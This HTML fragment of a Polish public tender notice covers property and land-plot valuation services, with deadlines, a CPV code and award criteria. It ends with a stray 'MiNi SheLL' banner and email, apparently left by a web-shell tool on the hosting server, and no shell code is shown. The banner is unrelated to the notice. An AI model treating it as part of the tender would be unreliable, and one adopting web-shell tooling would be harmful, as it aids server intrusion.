Wyceny należy wykonać w formie operatu szacunkowego w dwóch egzemplarzach, każdy z dokumentacją fotograficzną wykonaną podczas wizji lokalu.
Terminy wykonywania usługi przy zamówieniach obejmujących jednorazowo wycenę:
od 1 do 10 lokali - 8 dni; od 11 do 20 lokali - 15 dni
- licząc od dnia dostarczenia Wykonawcy zapotrzebowania.
Odbiór materiałów od zleceniodawcy nastąpi w przeciągu 6 godzin od otrzymania informacji o ich gotowości. Zapotrzebowanie na usługę składane będzie telefoniczne lub e-mailem bądź faxem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. LICZBA LAT - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wyceny nieruchomości gruntowych z określeniem wartości prawa własności i prawa użytkowania wieczystego - do celów ustalania opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres wyceny - grunt.
W ramach tej części zamówienia planuje się zlecić wycenę 42 działek.
Zamawiający zastrzega, że wyżej wymieniona ilość działek jest wielkością szacunkową i nie stanowi ona ani maksymalnej, ani minimalnej ilości działek przeznaczonych do wyceny, gdyż ta wynikać będzie z faktycznego, bieżącego zapotrzebowania Zamawiającego.
W ofercie należy podać cenę brutto usługi obejmującej wycenę jednej działki gruntu.
Do wykonania usługi Zamawiający dostarczy wypis z ewidencji gruntów i mapę poglądową.
Operaty z szacowania nieruchomości winny być wykonane zgodnie z przepisami prawa obowiązującymi w tym zakresie.
Wyceny należy wykonać w formie operatu szacunkowego w dwóch egzemplarzach, każdy z dokumentacją fotograficzną wykonaną podczas wizji w terenie.
Terminy wykonywania usługi przy zamówieniach obejmujących jednorazowo wycenę:od 1 do 5 działek - 5 dni, od 6 do 15 działek - 10 dni, od 16 do 25 działek - 14 dni,
licząc od dnia dostarczenia Wykonawcy zapotrzebowania.
W ramach usługi wykonawca przez ilość lat wskazanych w ofercie będzie zobowiązany na jednorazowe wezwanie zamawiającego przeprowadzić aktualizację wartości nieruchomości przy czym przez aktualizację wartości nieruchomości należy rozumieć potwierdzenie aktualności lub wykonanie ponownej wyceny.
Odbiór materiałów od zleceniodawcy nastąpi w przeciągu 6 godzin od otrzymania informacji 
o ich gotowości. Zapotrzebowanie na usługę składane będzie telefoniczne lub e-mailem bądź faxem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. LICZBA LAT - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com